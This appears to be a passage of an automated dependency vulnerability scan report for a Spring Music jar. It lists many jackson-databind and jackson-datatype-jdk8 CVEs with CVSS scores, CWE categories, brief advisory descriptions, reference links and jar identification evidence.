CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-10672
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms). CWE-502 Deserialization of Untrusted Data, NVD-CWE-Other
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-10673
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). CWE-502 Deserialization of Untrusted Data, NVD-CWE-Other
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-10968
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-10969
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-11111
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-11112
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-11113
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References: af854a3a-2127-422b-91ae-364da2661108, cve@mitre.org (MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY)
Vulnerable Software & Versions:
CVE-2020-10650
A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
References:
CVE-2020-11619
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-11620
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-14060
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-14061
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-14062
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-14195
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-24616
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-24750
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-35490
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-35491
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-35728
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36179
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36180
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36181
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36182
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36183
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36184
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36185
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36186
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36187
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36188
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36189
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2021-20190
A flaw was found in jackson-databind before 2.9.10.7. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: HIGH (8.3) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:C
References:
CVE-2018-12022
An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Jodd-db jar (for database access for the Jodd framework) in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload.
CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P
References:
OSSINDEX - [CVE-2018-12022] CWE-502: Deserialization of Untrusted Data
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12022
OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution
OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2052
CVE-2018-12023
An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Oracle JDBC jar in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P
References:
OSSINDEX - [CVE-2018-12023] CWE-502: Deserialization of Untrusted Data
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12023
OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution
OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2058
Vulnerable Software & Versions:
CVE-2019-12086
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2019-14439
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2020-25649
A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
OSSINDEX - [CVE-2020-25649] CWE-611: Improper Restriction of XML External Entity Reference ('XXE')
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25649
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2589
Vulnerable Software & Versions:
CVE-2020-36518
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2022-42003
In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
OSSINDEX - [CVE-2022-42003] CWE-502: Deserialization of Untrusted Data
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42003
OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/3590
Vulnerable Software & Versions:
CVE-2022-42004
In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References:
OSSINDEX - [CVE-2022-42004] CWE-502: Deserialization of Untrusted Data
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42004
OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/3582
Vulnerable Software & Versions:
CVE-2018-1000873
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2019-12384
FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2019-12814
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-35116
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.0/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: jackson-datatype-jdk8-2.9.5.jar
Description:
Add-on module for Jackson (http://jackson.codehaus.org) to support
JDK 8 data types.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-datatype-jdk8-2.9.5.jar
MD5: c3ae868458aa70411434fc1b2e219aca
SHA1: 023e37f085279ba316c0df923513b81609e1d1f6
SHA256: b31178ec713672c6abe49809d9295663de7091e7e226c8cdbd58557100af9afc
Evidence (Type | Source | Name | Value | Confidence):
Vendor | file | name | jackson-datatype-jdk8 | High
Vendor | jar | package name | datatype | Highest
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | jdk8 | Highest
Vendor | Manifest | automatic-module-name | com.fasterxml.jackson.datatype.jdk8 | Medium
Vendor | Manifest | bundle-docurl | https://github.com/FasterXML/jackson-modules-java8/jackson-datatype-jdk8 | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.datatype.jackson-datatype-jdk8 | Medium
Vendor | Manifest | implementation-build-date | 2018-03-26 15:52:15+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.datatype | Medium
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-datatype-jdk8 | Low
Vendor | pom | groupid | com.fasterxml.jackson.datatype | Highest
Vendor | pom | name | Jackson datatype: jdk8 | High
Vendor | pom | parent-artifactid | jackson-modules-java8 | Low
Vendor | pom | parent-groupid | com.fasterxml.jackson.module | Medium
Product | file | name | jackson-datatype-jdk8 | High
Product | jar | package name | datatype | Highest
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | jdk8 | Highest
Product | Manifest | automatic-module-name | com.fasterxml.jackson.datatype.jdk8 | Medium
Product | Manifest | bundle-docurl | https://github.com/FasterXML/jackson-modules-java8/jackson-datatype-jdk8 | Low
Product | Manifest | Bundle-Name | Jackson datatype: jdk8 | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.datatype.jackson-datatype-jdk8 | Medium
Product | Manifest | implementation-build-date | 2018-03-26 15:52:15+0000 | Low
Product | Manifest | Implementation-Title | Jackson datatype: jdk8 | High
Product | Manifest | specification-title | Jackson datatype: jdk8 | Medium
Product | pom | artifactid | jackson-datatype-jdk8 | Highest
Product | pom | groupid | com.fasterxml.jackson.datatype | Highest
Product | pom | name | Jackson datatype: jdk8 | High
Product | pom | parent-artifactid | jackson-modules-java8 | Medium
Product | pom | parent-groupid | com.fasterxml.jackson.module | Medium
Version | file | version | 2.9.5 | High
Version | Manifest | Bundle-Version | 2.9.5 | High
Version | Manifest | Implementation-Version | 2.9.5 | High
Version | pom | version | 2.9.5 | Highest
Related Dependencies:
spring-music-sqldb-1.0.jar: jackson-datatype-jsr310-2.9.5.jar
spring-music-sqldb-1.0.jar: jackson-module-parameter-names-2.9.5.jar
CVE-2018-1000873
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
